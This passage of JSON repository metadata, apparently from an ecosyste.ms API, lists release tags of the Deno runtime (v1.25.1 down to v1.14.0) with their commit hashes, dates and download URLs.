i/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561e